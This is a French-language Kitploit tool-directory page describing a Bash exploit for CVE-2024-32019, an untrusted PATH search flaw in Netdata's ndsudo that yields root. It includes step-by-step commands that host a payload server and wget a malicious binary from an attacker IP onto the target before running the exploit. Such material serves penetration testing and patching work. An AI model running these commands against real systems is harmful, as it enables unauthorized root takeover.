Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-32019-ndsudo — Exploit d'élévation de privilèges basé sur Bash pour CVE-2024-32019 dans l'outil ndsudo de l'agent Netdata, exploitant la recherche de chemin non fiable pour exécuter des binaires arbitraires avec les privilèges root. | Kitploit
Outils/GitHubGitHub/justjoeyking/cve-2024-32019-ndsudo
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationPost-ExploitationTests d'IntrusionRed Teaming
GitHubjustjoeyking/cve-2024-32019-ndsudo

CVE-2024-32019-ndsudo

Exploit d'élévation de privilèges basé sur Bash pour CVE-2024-32019 dans l'outil ndsudo de l'agent Netdata, exploitant la recherche de chemin non fiable pour exécuter des binaires arbitraires avec les privilèges root.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
12il y a 9 moisPas encore vérifié

La vulnérabilité ndsudo permet à un attaquant d'obtenir des privilèges root en exploitant un chemin de recherche non fiable dans l'outil ndsudo, qui fait partie de l'Agent Netdata. Cela peut permettre l'exécution de programmes arbitraires avec des privilèges élevés si l'attaquant place un binaire malveillant dans un répertoire inscriptible et modifie la variable d'environnement PATH en conséquence.

La vulnérabilité ndsudo, identifiée comme CVE-2024-32019, affecte les versions de l'outil ndsudo incluses avec l'Agent Netdata, plus précisément les versions v1.45.0 et inférieures. Cette vulnérabilité permet à des attaquants d'élever leurs privilèges sur les systèmes où l'outil est installé.

Comment fonctionne la vulnérabilité :

Mécanisme d'exploitation :-

Chemin de recherche non fiable : L'outil ndsudo utilise la variable d'environnement PATH pour localiser les commandes externes. Un attaquant peut manipuler cette variable pour pointer vers un répertoire qu'il contrôle.

Exécution de binaires malveillants : En plaçant un exécutable malveillant portant le même nom qu'une commande que ndsudo est autorisé à exécuter (par exemple, nvme) dans un répertoire inscriptible, l'attaquant peut exécuter du code arbitraire avec les privilèges root.

Complexité de l'attaque :-

Faible complexité : L'attaque ne nécessite pas de compétences avancées ; un script bash facilement réalisable peut être utilisé pour l'élévation de privilèges, la rendant accessible à de nombreux attaquants potentiels.

Impact de la vulnérabilité :-

Élévation de privilèges : Une exploitation réussie permet à un attaquant d'obtenir un accès root, ce qui peut conduire à un contrôle total du système affecté.

Risques potentiels : Cela peut entraîner un accès non autorisé aux données, une manipulation du système et une exploitation ultérieure des ressources réseau.

ÉLÉVATION DE PRIVILÈGES J'ai créé deux scripts bash pour obtenir facilement un accès root à partir d'un utilisateur. Suivez les étapes comme indiqué ci-dessous :-

root@kitploit:~
  git clone https://github.com/justjoeyking/CVE-2024-32019-ndsudo.git

  cd CVE-2024-32019-ndsudo

  chmod +x ndsudo_exp.sh

Créez maintenant un serveur python :

root@kitploit:~
  python3 -m http.server 8080

Ouvrez le fichier ndsudo_exploit.sh avec gedit ou pluma selon ce qui est disponible. Vous verrez une commande wget comme ceci :

root@kitploit:~
  wget http://10.10.14.70:8080/nvme -o /tmp/nvme

Remplacez l'adresse IP par l'adresse IP de votre propre machine.

Allez maintenant sur la machine cible, ouvrez un terminal et effectuez les opérations suivantes :

root@kitploit:~
  wget http://<votre-ip>:8080/ndsudo_exploit.sh

  chmod +x ndsudo_exploit.sh

  ./ndsudo_exploit.sh
Télécharger l’outil